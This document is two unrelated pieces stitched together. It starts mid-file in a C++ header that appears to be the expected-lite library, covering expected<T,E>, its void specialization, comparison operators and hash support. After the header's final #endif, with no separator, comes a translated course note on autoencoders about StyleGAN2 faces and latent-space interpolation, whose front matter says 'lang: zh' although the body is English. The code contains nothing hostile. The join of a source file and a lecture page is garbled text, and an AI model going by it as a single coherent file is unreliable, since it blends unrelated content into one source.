{}
virtual char const * what() const noexcept override
{
return "bad_expected_access";
}
nsel_constexpr14 error_type & error() &
{
return m_error;
}
constexpr error_type const & error() const &
{
return m_error;
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
nsel_constexpr14 error_type && error() &&
{
return std::move( m_error );
}
constexpr error_type const && error() const &&
{
return std::move( m_error );
}
#endif
private:
error_type m_error;
};
#endif // nsel_CONFIG_NO_EXCEPTIONS
/// x.x.8 unexpect tag, in_place_unexpected tag: construct an error
struct unexpect_t{};
using in_place_unexpected_t = unexpect_t;
nsel_inline17 constexpr unexpect_t unexpect{};
nsel_inline17 constexpr unexpect_t in_place_unexpected{};
/// class error_traits
#if nsel_CONFIG_NO_EXCEPTIONS
namespace detail {
inline bool text( char const * /*text*/ ) { return true; }
}
template< typename Error >
struct error_traits
{
static void rethrow( Error const & /*e*/ )
{
assert( false && detail::text("throw bad_expected_access<Error>{ e };") );
}
};
template<>
struct error_traits< std::exception_ptr >
{
static void rethrow( std::exception_ptr const & /*e*/ )
{
assert( false && detail::text("throw bad_expected_access<std::exception_ptr>{ e };") );
}
};
template<>
struct error_traits< std::error_code >
{
static void rethrow( std::error_code const & /*e*/ )
{
assert( false && detail::text("throw std::system_error( e );") );
}
};
#else // nsel_CONFIG_NO_EXCEPTIONS
template< typename Error >
struct error_traits
{
static void rethrow( Error const & e )
{
throw bad_expected_access<Error>{ e };
}
};
template<>
struct error_traits< std::exception_ptr >
{
static void rethrow( std::exception_ptr const & e )
{
std::rethrow_exception( e );
}
};
template<>
struct error_traits< std::error_code >
{
static void rethrow( std::error_code const & e )
{
throw std::system_error( e );
}
};
#endif // nsel_CONFIG_NO_EXCEPTIONS
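// Note: error_traits<E>::rethrow() is what expected<T, E>::value() invokes
// when no value is contained: a generic E is thrown wrapped in
// bad_expected_access<E>, a stored std::exception_ptr is rethrown as the
// original exception, and a std::error_code is surfaced as std::system_error.
// With exceptions disabled, each case asserts instead.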
} // namespace expected_lite
// provide nonstd::unexpected_type:
using expected_lite::unexpected_type;
namespace expected_lite {
/// class expected
#if nsel_P0323R <= 2
template< typename T, typename E = std::exception_ptr >
class expected
#else
template< typename T, typename E >
class expected
#endif // nsel_P0323R
{
private:
template< typename, typename > friend class expected;
public:
using value_type = T;
using error_type = E;
using unexpected_type = nonstd::unexpected_type<E>;
template< typename U >
struct rebind
{
using type = expected<U, error_type>;
};
// x.x.4.1 constructors
nsel_REQUIRES_0(
std::is_default_constructible<T>::value
)
nsel_constexpr14 expected()
: contained( true )
{
contained.construct_value( value_type() );
}
nsel_constexpr14 expected( expected const & ) = default;
nsel_constexpr14 expected( expected && ) = default;
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U const &>::value
&& std::is_constructible<E, G const &>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& (!std::is_convertible<U const &, T>::value || !std::is_convertible<G const &, E>::value ) /*=> explicit */
)
>
nsel_constexpr14 explicit expected( expected<U, G> const & other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( T{ other.contained.value() } );
else contained.construct_error( E{ other.contained.error() } );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U const &>::value
&& std::is_constructible<E, G const &>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const &, T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& !(!std::is_convertible<U const &, T>::value || !std::is_convertible<G const &, E>::value ) /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( expected<U, G> const & other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( other.contained.value() );
else contained.construct_error( other.contained.error() );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U>::value
&& std::is_constructible<E, G>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& (!std::is_convertible<U, T>::value || !std::is_convertible<G, E>::value ) /*=> explicit */
)
>
nsel_constexpr14 explicit expected( expected<U, G> && other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( T{ std::move( other.contained.value() ) } );
else contained.construct_error( E{ std::move( other.contained.error() ) } );
}
template< typename U, typename G
nsel_REQUIRES_T(
std::is_constructible< T, U>::value
&& std::is_constructible<E, G>::value
&& !std::is_constructible<T, expected<U, G> & >::value
&& !std::is_constructible<T, expected<U, G> && >::value
&& !std::is_constructible<T, expected<U, G> const & >::value
&& !std::is_constructible<T, expected<U, G> const && >::value
&& !std::is_convertible< expected<U, G> & , T>::value
&& !std::is_convertible< expected<U, G> &&, T>::value
&& !std::is_convertible< expected<U, G> const & , T>::value
&& !std::is_convertible< expected<U, G> const &&, T>::value
&& !(!std::is_convertible<U, T>::value || !std::is_convertible<G, E>::value ) /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( expected<U, G> && other )
: contained( other.has_value() )
{
if ( has_value() ) contained.construct_value( std::move( other.contained.value() ) );
else contained.construct_error( std::move( other.contained.error() ) );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_copy_constructible<U>::value
)
>
nsel_constexpr14 expected( value_type const & value )
: contained( true )
{
contained.construct_value( value );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_constructible<T,U&&>::value
&& !std::is_same<typename std20::remove_cvref<U>::type, nonstd_lite_in_place_t(U)>::value
&& !std::is_same< expected<T,E> , typename std20::remove_cvref<U>::type>::value
&& !std::is_same<nonstd::unexpected_type<E>, typename std20::remove_cvref<U>::type>::value
&& !std::is_convertible<U&&,T>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( U && value ) noexcept
(
std::is_nothrow_move_constructible<U>::value &&
std::is_nothrow_move_constructible<E>::value
)
: contained( true )
{
contained.construct_value( T{ std::forward<U>( value ) } );
}
template< typename U = T
nsel_REQUIRES_T(
std::is_constructible<T,U&&>::value
&& !std::is_same<typename std20::remove_cvref<U>::type, nonstd_lite_in_place_t(U)>::value
&& !std::is_same< expected<T,E> , typename std20::remove_cvref<U>::type>::value
&& !std::is_same<nonstd::unexpected_type<E>, typename std20::remove_cvref<U>::type>::value
&& std::is_convertible<U&&,T>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( U && value ) noexcept
(
std::is_nothrow_move_constructible<U>::value &&
std::is_nothrow_move_constructible<E>::value
)
: contained( true )
{
contained.construct_value( std::forward<U>( value ) );
}
// construct error:
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G const & >::value
&& !std::is_convertible< G const &, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( E{ error.value() } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G const & >::value
&& std::is_convertible< G const &, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( error.value() );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G&& >::value
&& !std::is_convertible< G&&, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( E{ std::move( error.value() ) } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_constructible<E, G&& >::value
&& std::is_convertible< G&&, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( std::move( error.value() ) );
}
// in-place construction, value
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<T, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( nonstd_lite_in_place_t(T), Args&&... args )
: contained( true )
{
contained.emplace_value( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<T, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( nonstd_lite_in_place_t(T), std::initializer_list<U> il, Args&&... args )
: contained( true )
{
contained.emplace_value( il, std::forward<Args>( args )... );
}
// in-place construction, error
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, Args&&... args )
: contained( false )
{
contained.emplace_error( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, std::initializer_list<U> il, Args&&... args )
: contained( false )
{
contained.emplace_error( il, std::forward<Args>( args )... );
}
// x.x.4.2 destructor
// TODO: ~expected: triviality
// Effects: If T is not cv void and is_trivially_destructible_v<T> is false and bool(*this), calls val.~T(). If is_trivially_destructible_v<E> is false and !bool(*this), calls unexpect.~unexpected<E>().
// Remarks: If either T is cv void or is_trivially_destructible_v<T> is true, and is_trivially_destructible_v<E> is true, then this destructor shall be a trivial destructor.
~expected()
{
if ( has_value() ) contained.destruct_value();
else contained.destruct_error();
}
// x.x.4.3 assignment
expected & operator=( expected const & other )
{
expected( other ).swap( *this );
return *this;
}
expected & operator=( expected && other ) noexcept
(
std::is_nothrow_move_constructible< T>::value
&& std::is_nothrow_move_assignable< T>::value
&& std::is_nothrow_move_constructible<E>::value // added for missing
&& std::is_nothrow_move_assignable< E>::value ) // nothrow above
{
expected( std::move( other ) ).swap( *this );
return *this;
}
template< typename U
nsel_REQUIRES_T(
!std::is_same<expected<T,E>, typename std20::remove_cvref<U>::type>::value
&& std17::conjunction<std::is_scalar<T>, std::is_same<T, std::decay<U>> >::value
&& std::is_constructible<T ,U>::value
&& std::is_assignable< T&,U>::value
&& std::is_nothrow_move_constructible<E>::value )
>
expected & operator=( U && value )
{
expected( std::forward<U>( value ) ).swap( *this );
return *this;
}
template< typename G
nsel_REQUIRES_T(
std::is_copy_constructible<E>::value // TODO: std::is_nothrow_copy_constructible<E>
&& std::is_copy_assignable<E>::value
)
>
expected & operator=( nonstd::unexpected_type<G> const & error )
{
expected( unexpect, error.value() ).swap( *this );
return *this;
}
template< typename G
nsel_REQUIRES_T(
std::is_move_constructible<E>::value // TODO: std::is_nothrow_move_constructible<E>
&& std::is_move_assignable<E>::value
)
>
expected & operator=( nonstd::unexpected_type<G> && error )
{
expected( unexpect, std::move( error.value() ) ).swap( *this );
return *this;
}
template< typename... Args
nsel_REQUIRES_T(
std::is_nothrow_constructible<T, Args&&...>::value
)
>
value_type & emplace( Args &&... args )
{
expected( nonstd_lite_in_place(T), std::forward<Args>(args)... ).swap( *this );
return value();
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_nothrow_constructible<T, std::initializer_list<U>&, Args&&...>::value
)
>
value_type & emplace( std::initializer_list<U> il, Args &&... args )
{
expected( nonstd_lite_in_place(T), il, std::forward<Args>(args)... ).swap( *this );
return value();
}
// x.x.4.4 swap
template< typename U=T, typename G=E >
nsel_REQUIRES_R( void,
std17::is_swappable< U>::value
&& std17::is_swappable<G>::value
&& ( std::is_move_constructible<U>::value || std::is_move_constructible<G>::value )
)
swap( expected & other ) noexcept
(
std::is_nothrow_move_constructible<T>::value && std17::is_nothrow_swappable<T&>::value &&
std::is_nothrow_move_constructible<E>::value && std17::is_nothrow_swappable<E&>::value
)
{
using std::swap;
if ( bool(*this) && bool(other) ) { swap( contained.value(), other.contained.value() ); }
else if ( ! bool(*this) && ! bool(other) ) { swap( contained.error(), other.contained.error() ); }
else if ( bool(*this) && ! bool(other) ) { error_type t( std::move( other.error() ) );
other.contained.destruct_error();
other.contained.construct_value( std::move( contained.value() ) );
contained.destruct_value();
contained.construct_error( std::move( t ) );
bool has_value = contained.has_value();
bool other_has_value = other.has_value();
other.contained.set_has_value(has_value);
contained.set_has_value(other_has_value);
}
else if ( ! bool(*this) && bool(other) ) { other.swap( *this ); }
}
// x.x.4.5 observers
constexpr value_type const * operator ->() const
{
return assert( has_value() ), contained.value_ptr();
}
value_type * operator ->()
{
return assert( has_value() ), contained.value_ptr();
}
constexpr value_type const & operator *() const &
{
return assert( has_value() ), contained.value();
}
value_type & operator *() &
{
return assert( has_value() ), contained.value();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr value_type const && operator *() const &&
{
return assert( has_value() ), std::move( contained.value() );
}
nsel_constexpr14 value_type && operator *() &&
{
return assert( has_value() ), std::move( contained.value() );
}
#endif
constexpr explicit operator bool() const noexcept
{
return has_value();
}
constexpr bool has_value() const noexcept
{
return contained.has_value();
}
constexpr value_type const & value() const &
{
return has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() );
}
value_type & value() &
{
return has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() );
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr value_type const && value() const &&
{
return std::move( has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() ) );
}
nsel_constexpr14 value_type && value() &&
{
return std::move( has_value()
? ( contained.value() )
: ( error_traits<error_type>::rethrow( contained.error() ), contained.value() ) );
}
#endif
constexpr error_type const & error() const &
{
return assert( ! has_value() ), contained.error();
}
error_type & error() &
{
return assert( ! has_value() ), contained.error();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr error_type const && error() const &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
error_type && error() &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
#endif
constexpr unexpected_type get_unexpected() const
{
return make_unexpected( contained.error() );
}
template< typename Ex >
bool has_exception() const
{
using ContainedEx = typename std::remove_reference< decltype( get_unexpected().value() ) >::type;
return ! has_value() && std::is_base_of< Ex, ContainedEx>::value;
}
template< typename U
nsel_REQUIRES_T(
std::is_copy_constructible< T>::value
&& std::is_convertible<U&&, T>::value
)
>
value_type value_or( U && v ) const &
{
return has_value()
? contained.value()
: static_cast<T>( std::forward<U>( v ) );
}
template< typename U
nsel_REQUIRES_T(
std::is_move_constructible< T>::value
&& std::is_convertible<U&&, T>::value
)
>
value_type value_or( U && v ) &&
{
return has_value()
? std::move( contained.value() )
: static_cast<T>( std::forward<U>( v ) );
}
// unwrap()
// template <class U, class E>
// constexpr expected<U,E> expected<expected<U,E>,E>::unwrap() const&;
// template <class T, class E>
// constexpr expected<T,E> expected<T,E>::unwrap() const&;
// template <class U, class E>
// expected<U,E> expected<expected<U,E>, E>::unwrap() &&;
// template <class T, class E>
// template expected<T,E> expected<T,E>::unwrap() &&;
// factories
// template< typename Ex, typename F>
// expected<T,E> catch_exception(F&& f);
// template< typename F>
// expected<decltype(func(declval<T>())),E> map(F&& func) ;
// template< typename F>
// 'see below' bind(F&& func);
// template< typename F>
// expected<T,E> catch_error(F&& f);
// template< typename F>
// 'see below' then(F&& func);
private:
detail::storage_t
<
T
,E
, std::is_copy_constructible<T>::value && std::is_copy_constructible<E>::value
, std::is_move_constructible<T>::value && std::is_move_constructible<E>::value
>
contained;
};
/// class expected, void specialization
template< typename E >
class expected<void, E>
{
private:
template< typename, typename > friend class expected;
public:
using value_type = void;
using error_type = E;
using unexpected_type = nonstd::unexpected_type<E>;
// x.x.4.1 constructors
constexpr expected() noexcept
: contained( true )
{}
nsel_constexpr14 expected( expected const & other ) = default;
nsel_constexpr14 expected( expected && other ) = default;
constexpr explicit expected( nonstd_lite_in_place_t(void) )
: contained( true )
{}
template< typename G = E
nsel_REQUIRES_T(
!std::is_convertible<G const &, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( E{ error.value() } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_convertible<G const &, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> const & error )
: contained( false )
{
contained.construct_error( error.value() );
}
template< typename G = E
nsel_REQUIRES_T(
!std::is_convertible<G&&, E>::value /*=> explicit */
)
>
nsel_constexpr14 explicit expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( E{ std::move( error.value() ) } );
}
template< typename G = E
nsel_REQUIRES_T(
std::is_convertible<G&&, E>::value /*=> non-explicit */
)
>
nsel_constexpr14 /*non-explicit*/ expected( nonstd::unexpected_type<G> && error )
: contained( false )
{
contained.construct_error( std::move( error.value() ) );
}
template< typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, Args&&... args )
: contained( false )
{
contained.emplace_error( std::forward<Args>( args )... );
}
template< typename U, typename... Args
nsel_REQUIRES_T(
std::is_constructible<E, std::initializer_list<U>, Args&&...>::value
)
>
nsel_constexpr14 explicit expected( unexpect_t, std::initializer_list<U> il, Args&&... args )
: contained( false )
{
contained.emplace_error( il, std::forward<Args>( args )... );
}
// destructor
~expected()
{
if ( ! has_value() )
{
contained.destruct_error();
}
}
// x.x.4.3 assignment
expected & operator=( expected const & other )
{
expected( other ).swap( *this );
return *this;
}
expected & operator=( expected && other ) noexcept
(
std::is_nothrow_move_assignable<E>::value &&
std::is_nothrow_move_constructible<E>::value )
{
expected( std::move( other ) ).swap( *this );
return *this;
}
void emplace()
{
expected().swap( *this );
}
// x.x.4.4 swap
template< typename G = E >
nsel_REQUIRES_R( void,
std17::is_swappable<G>::value
&& std::is_move_constructible<G>::value
)
swap( expected & other ) noexcept
(
std::is_nothrow_move_constructible<E>::value && std17::is_nothrow_swappable<E&>::value
)
{
using std::swap;
if ( ! bool(*this) && ! bool(other) ) { swap( contained.error(), other.contained.error() ); }
else if ( bool(*this) && ! bool(other) ) { contained.construct_error( std::move( other.error() ) );
bool has_value = contained.has_value();
bool other_has_value = other.has_value();
other.contained.set_has_value(has_value);
contained.set_has_value(other_has_value);
}
else if ( ! bool(*this) && bool(other) ) { other.swap( *this ); }
}
// x.x.4.5 observers
constexpr explicit operator bool() const noexcept
{
return has_value();
}
constexpr bool has_value() const noexcept
{
return contained.has_value();
}
void value() const
{
if ( ! has_value() )
{
error_traits<error_type>::rethrow( contained.error() );
}
}
constexpr error_type const & error() const &
{
return assert( ! has_value() ), contained.error();
}
error_type & error() &
{
return assert( ! has_value() ), contained.error();
}
#if !nsel_COMPILER_GNUC_VERSION || nsel_COMPILER_GNUC_VERSION >= 490
constexpr error_type const && error() const &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
error_type && error() &&
{
return assert( ! has_value() ), std::move( contained.error() );
}
#endif
constexpr unexpected_type get_unexpected() const
{
return make_unexpected( contained.error() );
}
template< typename Ex >
bool has_exception() const
{
using ContainedEx = typename std::remove_reference< decltype( get_unexpected().value() ) >::type;
return ! has_value() && std::is_base_of< Ex, ContainedEx>::value;
}
// template constexpr 'see below' unwrap() const&;
//
// template 'see below' unwrap() &&;
// factories
// template< typename Ex, typename F>
// expected<void,E> catch_exception(F&& f);
//
// template< typename F>
// expected<decltype(func()), E> map(F&& func) ;
//
// template< typename F>
// 'see below' bind(F&& func) ;
//
// template< typename F>
// expected<void,E> catch_error(F&& f);
//
// template< typename F>
// 'see below' then(F&& func);
private:
detail::storage_t
<
void
, E
, std::is_copy_constructible<E>::value
, std::is_move_constructible<E>::value
>
contained;
};
// x.x.4.6 expected<>: comparison operators
template< typename T1, typename E1, typename T2, typename E2 >
constexpr bool operator==( expected<T1,E1> const & x, expected<T2,E2> const & y )
{
return bool(x) != bool(y) ? false : bool(x) == false ? x.error() == y.error() : *x == *y;
}
template< typename T1, typename E1, typename T2, typename E2 >
constexpr bool operator!=( expected<T1,E1> const & x, expected<T2,E2> const & y )
{
return !(x == y);
}
template< typename E1, typename E2 >
constexpr bool operator==( expected<void,E1> const & x, expected<void,E2> const & y )
{
return bool(x) != bool(y) ? false : bool(x) == false ? x.error() == y.error() : true;
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, expected<T,E> const & y )
{
return (!y) ? false : (!x) ? true : *x < *y;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, expected<T,E> const & y )
{
return (y < x);
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, expected<T,E> const & y )
{
return !(y < x);
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, expected<T,E> const & y )
{
return !(x < y);
}
#endif
// x.x.4.7 expected: comparison with T
template< typename T1, typename E1, typename T2 >
constexpr bool operator==( expected<T1,E1> const & x, T2 const & v )
{
return bool(x) ? *x == v : false;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator==(T2 const & v, expected<T1,E1> const & x )
{
return bool(x) ? v == *x : false;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator!=( expected<T1,E1> const & x, T2 const & v )
{
return bool(x) ? *x != v : true;
}
template< typename T1, typename E1, typename T2 >
constexpr bool operator!=( T2 const & v, expected<T1,E1> const & x )
{
return bool(x) ? v != *x : true;
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, T const & v )
{
return bool(x) ? *x < v : true;
}
template< typename T, typename E >
constexpr bool operator<( T const & v, expected<T,E> const & x )
{
return bool(x) ? v < *x : false;
}
template< typename T, typename E >
constexpr bool operator>( T const & v, expected<T,E> const & x )
{
return bool(x) ? *x < v : false;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, T const & v )
{
return bool(x) ? v < *x : false;
}
template< typename T, typename E >
constexpr bool operator<=( T const & v, expected<T,E> const & x )
{
return bool(x) ? ! ( *x < v ) : false;
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, T const & v )
{
return bool(x) ? ! ( v < *x ) : true;
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, T const & v )
{
return bool(x) ? ! ( *x < v ) : false;
}
template< typename T, typename E >
constexpr bool operator>=( T const & v, expected<T,E> const & x )
{
return bool(x) ? ! ( v < *x ) : true;
}
#endif // nsel_P0323R
// x.x.4.8 expected: comparison with unexpected_type
template< typename T1, typename E1 , typename E2 >
constexpr bool operator==( expected<T1,E1> const & x, unexpected_type<E2> const & u )
{
return (!x) ? x.get_unexpected() == u : false;
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator==( unexpected_type<E2> const & u, expected<T1,E1> const & x )
{
return ( x == u );
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator!=( expected<T1,E1> const & x, unexpected_type<E2> const & u )
{
return ! ( x == u );
}
template< typename T1, typename E1 , typename E2 >
constexpr bool operator!=( unexpected_type<E2> const & u, expected<T1,E1> const & x )
{
return ! ( x == u );
}
#if nsel_P0323R <= 2
template< typename T, typename E >
constexpr bool operator<( expected<T,E> const & x, unexpected_type<E> const & u )
{
return (!x) ? ( x.get_unexpected() < u ) : false;
}
template< typename T, typename E >
constexpr bool operator<( unexpected_type<E> const & u, expected<T,E> const & x )
{
return (!x) ? ( u < x.get_unexpected() ) : true ;
}
template< typename T, typename E >
constexpr bool operator>( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ( u < x );
}
template< typename T, typename E >
constexpr bool operator>( unexpected_type<E> const & u, expected<T,E> const & x )
{
return ( x < u );
}
template< typename T, typename E >
constexpr bool operator<=( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ! ( u < x );
}
template< typename T, typename E >
constexpr bool operator<=( unexpected_type<E> const & u, expected<T,E> const & x)
{
return ! ( x < u );
}
template< typename T, typename E >
constexpr bool operator>=( expected<T,E> const & x, unexpected_type<E> const & u )
{
return ! ( u > x );
}
template< typename T, typename E >
constexpr bool operator>=( unexpected_type<E> const & u, expected<T,E> const & x )
{
return ! ( x > u );
}
#endif // nsel_P0323R
/// x.x.x Specialized algorithms
template< typename T, typename E
nsel_REQUIRES_T(
( std::is_void<T>::value || std::is_move_constructible<T>::value )
&& std::is_move_constructible<E>::value
&& std17::is_swappable<T>::value
&& std17::is_swappable<E>::value )
>
void swap( expected<T,E> & x, expected<T,E> & y ) noexcept ( noexcept ( x.swap(y) ) )
{
x.swap( y );
}
#if nsel_P0323R <= 3
template< typename T >
constexpr auto make_expected( T && v ) -> expected< typename std::decay<T>::type >
{
return expected< typename std::decay<T>::type >( std::forward<T>( v ) );
}
// expected<void> specialization:
auto inline make_expected() -> expected<void>
{
return expected<void>( in_place );
}
template< typename T >
constexpr auto make_expected_from_current_exception() -> expected<T>
{
return expected<T>( make_unexpected_from_current_exception() );
}
template< typename T >
auto make_expected_from_exception( std::exception_ptr v ) -> expected<T>
{
return expected<T>( unexpected_type<std::exception_ptr>( std::forward<std::exception_ptr>( v ) ) );
}
template< typename T, typename E >
constexpr auto make_expected_from_error( E e ) -> expected<T, typename std::decay<E>::type>
{
return expected<T, typename std::decay<E>::type>( make_unexpected( e ) );
}
template< typename F
nsel_REQUIRES_T( ! std::is_same<typename std::result_of<F()>::type, void>::value )
>
/*nsel_constexpr14*/
auto make_expected_from_call( F f ) -> expected< typename std::result_of<F()>::type >
{
try
{
return make_expected( f() );
}
catch (...)
{
return make_unexpected_from_current_exception();
}
}
template< typename F
nsel_REQUIRES_T( std::is_same<typename std::result_of<F()>::type, void>::value )
>
/*nsel_constexpr14*/
auto make_expected_from_call( F f ) -> expected<void>
{
try
{
f();
return make_expected();
}
catch (...)
{
return make_unexpected_from_current_exception();
}
}
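// Usage sketch (illustrative only, not part of the library interface):
//
//   nonstd::expected<int, std::string> parse_int( char const * text )
//   {
//       if ( text == nullptr )
//           return nonstd::make_unexpected( std::string( "null input" ) );
//       return std::atoi( text );
//   }
//
//   auto r = parse_int( "42" );
//   if ( r ) { /* use *r */ } else { /* inspect r.error() */ }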
#endif // nsel_P0323R
} // namespace expected_lite
using namespace expected_lite;
// using expected_lite::expected;
// using ...
} // namespace nonstd
namespace std {
// expected: hash support
template< typename T, typename E >
struct hash< nonstd::expected<T,E> >
{
using result_type = std::size_t;
using argument_type = nonstd::expected<T,E>;
constexpr result_type operator()(argument_type const & arg) const
{
return arg ? std::hash<T>{}(*arg) : result_type{};
}
};
// TBD - ?? remove? see spec.
template< typename T, typename E >
struct hash< nonstd::expected<T&,E> >
{
using result_type = std::size_t;
using argument_type = nonstd::expected<T&,E>;
constexpr result_type operator()(argument_type const & arg) const
{
return arg ? std::hash<T>{}(*arg) : result_type{};
}
};
// TBD - implement
// If bool(e), hash<expected<void,E>>()(e) shall evaluate to the hashing of true;
// otherwise it evaluates to an unspecified value if E is exception_ptr, or
// to a combination of hashing false and hash<E>()(e.error()).
template< typename E >
struct hash< nonstd::expected<void,E> >
{
};
} // namespace std
namespace nonstd {
// void unexpected() is deprecated && removed in C++17
#if nsel_CPP17_OR_GREATER || nsel_COMPILER_MSVC_VERSION > 141
template< typename E >
using unexpected = unexpected_type<E>;
#endif
} // namespace nonstd
#undef nsel_REQUIRES
#undef nsel_REQUIRES_0
#undef nsel_REQUIRES_T
nsel_RESTORE_WARNINGS()
#endif // nsel_USES_STD_EXPECTED
#endif // NONSTD_EXPECTED_LITE_HPP
---
lang-ref: ch.07-3
title: Introduction to autoencoders
lecturer: Alfredo Canziani
authors: Xinmeng Li, Atul Gandhi, Li Jiang, Xiao Li
date: 10 March 2020
lang: zh
translation-date: 20 June 2020
translator: Jonathan Sum
---
## [Applications of autoencoders](https://www.youtube.com/watch?v=bggWQ14DD9M&t=55s)
### Image generation
Can you tell which face in Figure 1 is fake? In fact, both of them were produced by the StyleGAN2 generator. Although the facial details are very realistic, the backgrounds look weird (left: blurriness, right: misshapen objects). This is because the neural network was trained on face samples, so the background has much higher variability. Here the data manifold has roughly 50 dimensions, equal to the degrees of freedom of a face image.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/1_faces_gen.jpg" height="150px" /><br>
<b>Figure 1</b>: Generated faces
</center>
### Difference of interpolation in pixel space and latent space
<center>
<img src="{{site.baseurl}}/images/week07/07-3/2_dog.jpg" height="120px"/><img src="{{site.baseurl}}/images/week07/07-3/2_bird.jpg" height="120px"/>
<br>
<b>Figure 2</b>: A dog and a bird
</center>
If we linearly interpolate between the dog and bird images in pixel space, we get a fading overlay of the two images, shown in Figure 3. From the top left to the bottom right, the dog image fades out and the bird image fades in.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/3_dog2bird.jpg" height="200px"/><br>
<b>Figure 3</b>: Results after interpolation in pixel space
</center>
If instead we interpolate between the two latent-space representations and feed them to the decoder, we get the transformation from dog to bird shown in Figure 4.
<center>
<img src="{{site.baseurl}}/images/week07/07-3/4_model_d2b.jpg" height="200px"/><br>
<b>Figure 4</b>: Results after feeding the interpolated representations into the decoder
</center>
Clearly, the latent space is better at capturing the structure of an image.
